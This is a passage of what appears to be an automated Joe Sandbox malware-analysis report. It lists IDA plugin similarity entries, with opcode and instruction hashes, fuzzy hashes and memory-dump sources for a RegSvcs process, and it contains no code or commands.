                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 36e8727768c172d87e47d6a266d93001da0051683ffb12a3f3d1066c0a64bf61
                                                              • Instruction ID: 749ff8459793534b17e86fd282332cfaa2cb74b8ab39e8d0bbaf010d0be2f47b
                                                              • Opcode Fuzzy Hash: 36e8727768c172d87e47d6a266d93001da0051683ffb12a3f3d1066c0a64bf61
                                                              • Instruction Fuzzy Hash: CAC1AE74E00218CFDB54DFA5C994BADBBB2EB88300F1081A9D909AB365DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58468e9aa3a8f7765c4ec8e67591d5805209ce81293268cb817ddacb960eec48
                                                              • Instruction ID: 24b49a12fce250f763d0c96aea688aca657b4452ac89e5463362c819e4d4e69f
                                                              • Opcode Fuzzy Hash: 58468e9aa3a8f7765c4ec8e67591d5805209ce81293268cb817ddacb960eec48
                                                              • Instruction Fuzzy Hash: 6DC1AE74E00218CFDB54DFA9C994BADBBB2BF88300F1084A9D909AB355DB359E85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ede233878d906535dd267cdd9ce41145ded9eb45eeb4173ee552961af7b9cce
                                                              • Instruction ID: a7a5e6f8cb02edb2a596d62df69d57ab48e4103f61a1dc86a39fae0042e1230c
                                                              • Opcode Fuzzy Hash: 6ede233878d906535dd267cdd9ce41145ded9eb45eeb4173ee552961af7b9cce
                                                              • Instruction Fuzzy Hash: 85C1C174E00218CFDB54DFA9C984B9DBBB2EF88300F1080A9D918AB365DB355E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e6dd4ac7d4f16496049815dee15005f7b32ac91001967634622f916b4e6ef89
                                                              • Instruction ID: 6f4918776b1f7916986bd9aedf32969296d33fa9db39716220d163a601c57eeb
                                                              • Opcode Fuzzy Hash: 8e6dd4ac7d4f16496049815dee15005f7b32ac91001967634622f916b4e6ef89
                                                              • Instruction Fuzzy Hash: 22A18F32E003698FCF55DFB4C84889EBBB6FF85300B15956AE812AB211DB31D945CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dcf5ab77ce276c94cc3ba7eace3df7c92784683e19fadf1cceb384c314fb2a9f
                                                              • Instruction ID: ba85fccfa65305fbbe1c3ca929effa1bb55715c4c2d978e00dc08e1f379dda1d
                                                              • Opcode Fuzzy Hash: dcf5ab77ce276c94cc3ba7eace3df7c92784683e19fadf1cceb384c314fb2a9f
                                                              • Instruction Fuzzy Hash: BEA11471D016598FDB10DFA9C884ADDFBB1FF89300F14C6AAE408A7265EB709A85CF41
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e465316e9cab76121e1b15bea5bad7bbcfac3752ca627f8fbde3b557a1520e3
                                                              • Instruction ID: 47aded0f6fc7beb5fb1b59d59565b1abe639c3f7a5955e9f530138d260a102d2
                                                              • Opcode Fuzzy Hash: 8e465316e9cab76121e1b15bea5bad7bbcfac3752ca627f8fbde3b557a1520e3
                                                              • Instruction Fuzzy Hash: A6A19F74E012288FEB28CF6AD944B9DFAF2BB89300F14D1EAD509A7255DB345A85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0282ab9566259ede527a3b7ceddffde202687e9c290b3ef4addd578ded403f3c
                                                              • Instruction ID: 82d80a68a56fa51c50860051d29d777ec597b0af8327c38d11d083c3eaff37af
                                                              • Opcode Fuzzy Hash: 0282ab9566259ede527a3b7ceddffde202687e9c290b3ef4addd578ded403f3c
                                                              • Instruction Fuzzy Hash: CAA19174E012188FEB68CF6AD944B9DFBF2BF89300F14D0AAD509A7255DB345A85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f2cdf498e9364ceafa452ec702381ee104228e2a447f5c75551dd4d2f24392d
                                                              • Instruction ID: d507c05a4a383006b8e139ef29ff9645e4f245cd5a8bc2817a46f37590752b54
                                                              • Opcode Fuzzy Hash: 8f2cdf498e9364ceafa452ec702381ee104228e2a447f5c75551dd4d2f24392d
                                                              • Instruction Fuzzy Hash: 6C71B375D05218CFDB68CF66C9846DDBBB2BF89301F1481EAD509A7264DB346E85CF00
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2f32af9cc11fa5a410e6d4afda803a26b1e7e3561c02e5a41b9d2a0cdaf052e